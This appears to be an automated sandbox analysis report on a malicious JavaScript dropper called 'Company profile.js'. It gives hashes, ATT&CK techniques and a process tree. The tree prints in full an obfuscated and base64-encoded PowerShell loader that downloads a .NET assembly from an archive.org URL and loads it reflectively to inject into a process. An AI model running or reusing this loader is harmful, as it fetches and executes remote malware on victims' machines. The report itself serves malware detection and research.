8bd71b8a951a759139aaa5b65632121142d0a2e2fd715a961aa86f424468f384

General

Target

Company profile.js
Size

318KB
MD5

bfa7d7d0e050ee48b84f4aba3b888e47
SHA1

5ff67abc444b37f7480f06679e3dd2ffd852c1f8
SHA256

8bd71b8a951a759139aaa5b65632121142d0a2e2fd715a961aa86f424468f384
SHA512

394b0fc2866d87c97fbfc9f6a8900caa262be71c605bd60df8c6f286f839322c43952cdef4b54867e2c3d21d134789e46d951bfcafc80d5bb62f21bf2391286e
SSDEEP

6144:B9jX2SizvvA5/6uuazcYJYD9Onbtc46BBYczl+GHbxAM2vaLkqN/su0KMb4kGrPt:/T2Ssv45/6udzNC9Ubh6ow+GdAfvEkGz

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1740	powershell.exe
6	1740	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2480	powershell.exe
1740	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2480	powershell.exe
1740	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2976 wrote to memory of 2480	2976	wscript.exe	30
PID 2976 wrote to memory of 2480	2976	wscript.exe	30
PID 2976 wrote to memory of 2480	2976	wscript.exe	30
PID 2480 wrote to memory of 1740	2480	powershell.exe	32
PID 2480 wrote to memory of 1740	2480	powershell.exe	32
PID 2480 wrote to memory of 1740	2480	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Company profile.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:2976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAgACgAIAAkAGUAbgB2ADoAQwBvAG0AcwBwAGUAYwBbADQALAAyADYALAAyADUAXQAtAEoATwBJAG4AJwAnACkAKAAgACgAKAAnAEYAUQB1ACcAKwAnAHUAcgBsACAAPQAgAHoAQgBoAGgAdAB0AHAAcwA6ACcAKwAnAC8ALwBpAGEAOQAwADQANgAwADEAJwArACcALgB1AHMAJwArACcALgBhAHIAYwBoAGkAdgBlAC4AbwByAGcAJwArACcALwA2AC8AaQB0AGUAbQBzAC8AZABlAHQAYQAnACsAJwBoACcAKwAnAC0AbgBvACcAKwAnAHQAZQAtAGoALwBEACcAKwAnAGUAJwArACcAdABhAGgATgBvAHQAZQBKAC4AdAB4ACcAKwAnAHQAegBCACcAKwAnAGgAOwBGAFEAJwArACcAdQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACAAPQAgACgATgBlACcAKwAnAHcALQBPAGIAagAnACsAJwBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlACcAKwAnAG4AJwArACcAdAApAC4ARABvAHcAbgBsAG8AYQAnACsAJwBkAFMAdAByACcAKwAnAGkAbgBnACgARgBRAHUAJwArACcAdQByACcAKwAnAGwAKQA7AEYAUQB1ACcAKwAnAGIAaQBuAGEAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwAnACsAJwBTAHkAcwB0AGUAbQAnACsAJwAuAEMAbwBuAHYAZQByAHQAXQA6ACcAKwAnADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEYAJwArACcAUQB1AGIAYQAnACsAJwBzAGUANgA0AEMAbwBuAHQAZQAnACsAJwBuAHQAKQA7AEYAJwArACcAUQAnACsAJwB1ACcAKwAnAGEAcwAnACsAJwBzAGUAbQBiACcAKwAnAGwAeQAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AJwArACcAYgBsAHkAXQA6ADoATABvAGEAZAAoAEYAUQB1AGIAJwArACcAaQBuAGEAcgAnACsAJwB5AEMAbwBuAHQAZQBuAHQAKQA7AEYAUQB1AHQAeQAnACsAJwBwAGUAJwArACcAIAAnACsAJwA9ACAARgBRACcAKwAnAHUAYQBzAHMAZQBtAGIAbAAnACsAJwB5AC4AJwArACcARwBlACcAKwAnAHQAJwArACcAVAB5AHAAZQAoAHoAJwArACcAQgBoACcAKwAnAFIAdQBuAFAARQAuAEgAbwBtACcAKwAnAGUAJwArACcAegBCAGgAKQA7AEYAUQB1AG0AJwArACcAZQB0AGgAbwBkACAAPQAgAEYAUQB1AHQAeQBwACcAKwAnAGUALgBHAGUAdAAnACsAJwBNAGUAdABoACcAKwAnAG8AZAAoAHoAQgBoACcAKwAnAFYAQQBJAHoAQgAnACsAJwBoACkAJwArACcAOwAnACsAJwBGAFEAdQBtAGUAJwArACcAdABoAG8AZAAuAEkAbgB2AG8AawBlACgARgBRACcAKwAnAHUAbgB1AGwAbAAsACcAKwAnACAAWwBvAGIAagBlAGMAdABbAF0AJwArACcAXQBAACgAegBCAGgAJwArACcAdAB4AHQALgBtAGkAegAvAHYAJwArACcAZQAnACsAJwBkAC4AJwArACcAMgByAC4AMwA5ACcAKwAnAGIAMwA0ADUAMwAwADIAYQAwADcANQBiADEAYgBjADAAZAA0ADUAYgA2ACcAKwAnADMAMgAnACsAJwBlAGIAOQBlAGUANgAyAC0AYgB1AHAALwAnACsAJwAvADoAcwBwAHQAdAAnACsAJwBoACcAKwAnAHoAJwArACcAQgBoACAALAAgAHoAQgBoAGQAZQBzAGEAdABpAHYAYQBkAG8AegBCAGgAJwArACcAIAAnACsAJwAsACAAegBCAGgAJwArACcAZABlAHMAYQB0AGkAdgAnACsAJwBhAGQAJwArACcAbwB6AEIAaAAgACwAIAB6AEIAaABkAGUAcwBhACcAKwAnAHQAaQB2AGEAZABvAHoAQgBoACwAegBCAGgAJwArACcAQQBkAGQASQBuACcAKwAnAFAAcgBvAGMAZQBzAHMAMwAyAHoAQgBoACcAKwAnACwAJwArACcAegBCAGgAZABlAHMAYQB0AGkAdgBhAGQAbwAnACsAJwB6AEIAaAApACcAKwAnACkAJwArACcAOwAnACkAIAAgAC0AQwBSAGUAUABMAEEAYwBFACAAIAAnAEYAUQB1ACcALABbAEMAaABBAFIAXQAzADYAIAAtAEMAUgBlAFAATABBAGMARQAgACAAKABbAEMAaABBAFIAXQAxADIAMgArAFsAQwBoAEEAUgBdADYANgArAFsAQwBoAEEAUgBdADEAMAA0ACkALABbAEMAaABBAFIAXQAzADkAKQAgACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $env:Comspec[4,26,25]-JOIn'')( (('FQu'+'url = zBhhttps:'+'//ia904601'+'.us'+'.archive.org'+'/6/items/deta'+'h'+'-no'+'te-j/D'+'e'+'tahNoteJ.tx'+'tzB'+'h;FQ'+'ubase64Content = (Ne'+'w-Obj'+'ect System.Net.WebC'+'lie'+'n'+'t).Downloa'+'dStr'+'ing(FQu'+'ur'+'l);FQu'+'binaryCon'+'tent = ['+'System'+'.Convert]:'+':FromBase64String(F'+'Quba'+'se64Conte'+'nt);F'+'Q'+'u'+'as'+'semb'+'ly = [Reflectio'+'n.Assem'+'bly]::Load(FQub'+'inar'+'yContent);FQuty'+'pe'+' '+'= FQ'+'uassembl'+'y.'+'Ge'+'t'+'Type(z'+'Bh'+'RunPE.Hom'+'e'+'zBh);FQum'+'ethod = FQutyp'+'e.Get'+'Meth'+'od(zBh'+'VAIzB'+'h)'+';'+'FQume'+'thod.Invoke(FQ'+'unull,'+' [object[]'+']@(zBh'+'txt.miz/v'+'e'+'d.'+'2r.39'+'b345302a075b1bc0d45b6'+'32'+'eb9ee62-bup/'+'/:sptt'+'h'+'z'+'Bh , zBhdesativadozBh'+' '+', zBh'+'desativ'+'ad'+'ozBh , zBhdesa'+'tivadozBh,zBh'+'AddIn'+'Process32zBh'+','+'zBhdesativado'+'zBh)'+')'+';') -CRePLAcE 'FQu',[ChAR]36 -CRePLAcE ([ChAR]122+[ChAR]66+[ChAR]104),[ChAR]39) )"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c151de959ac310ae59f3ca23f8886253

SHA1
c2502d74c9eef8fb14c56fb6e9683cf6a1048831

SHA256
0e10783b8d17b17ae2022de7a10a7e4d5aeb670391971fa36a94f3213cc106ea

SHA512
e233e45f26d0d6632924f5809e304c0f864d04e91cca108871c613adeff07983f813508e05effc76ab5ccb26fc5e85a4cc113a9270224f15c3d211b83ca6dd89

Download Submit
memory/2480-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp

Filesize
4KB

Download
memory/2480-5-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

Filesize
2.9MB

Download
memory/2480-6-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/2480-7-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-8-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-9-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-10-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-16-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing